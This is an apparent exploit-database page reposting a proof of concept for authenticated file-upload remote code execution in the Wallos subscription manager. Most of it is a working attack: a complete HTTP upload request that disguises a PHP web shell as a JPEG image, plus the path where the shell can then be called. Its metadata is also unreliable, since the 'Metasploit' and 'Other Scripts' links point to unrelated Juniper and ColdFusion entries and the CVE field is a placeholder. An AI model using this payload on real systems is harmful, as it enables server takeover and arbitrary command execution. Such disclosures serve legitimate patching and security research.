Wallos - File Upload Remote Code Execution (Authenticated)

vendor:

Wallos

by:

sml

7.1

CVSS

HIGH

Remote Code Execution (RCE)

434

CWE

Product Name: Wallos

Affected Version From: Version 1.0

Affected Version To: Version 1.11.2

Patch Exists: NO

Related CWE: CVE-2024-XXXXX

CPE: a:ellite:wallos

Metasploit: https://www.rapid7.com/db/vulnerabilities/juniper-junos-os-jsa79179/

Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/http/coldfusion_locale_traversal

Platforms Tested: Debian 12

2024

Wallos – File Upload Remote Code Execution (Authenticated)

Wallos, a subscription management system, is vulnerable to a file upload RCE exploit. By manipulating the file upload functionality, an authenticated attacker can upload a malicious .php file containing a web shell. This allows them to execute arbitrary commands on the target system.

Mitigation:

To mitigate this vulnerability, ensure that file uploads are properly validated and restricted to specific file types. Implement input validation to prevent the upload of executable files. Regularly update the software to patched versions.

Source

Exploit-DB raw data:

# Exploit Title: Wallos - File Upload RCE (Authenticated)
# Date: 2024-03-04
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://github.com/ellite/Wallos
# Software Link: https://github.com/ellite/Wallos
# Version: < 1.11.2
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.
This can be bypassed to upload a malicious .php file.

POC
---

1) Log into the application.
2) Go to "New Subscription"
3) Upload Logo and choose your webshell .php
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1

Host: 192.168.1.44

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.44/

Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324

Origin: http://192.168.1.44

Content-Length: 7220

Connection: close

Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="name"

test

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo"; filename="revshell.php"

Content-Type: image/jpeg

GIF89a;

<?php
system($_GET['cmd']);
?> 

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}


6) Your file will be located in: 
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php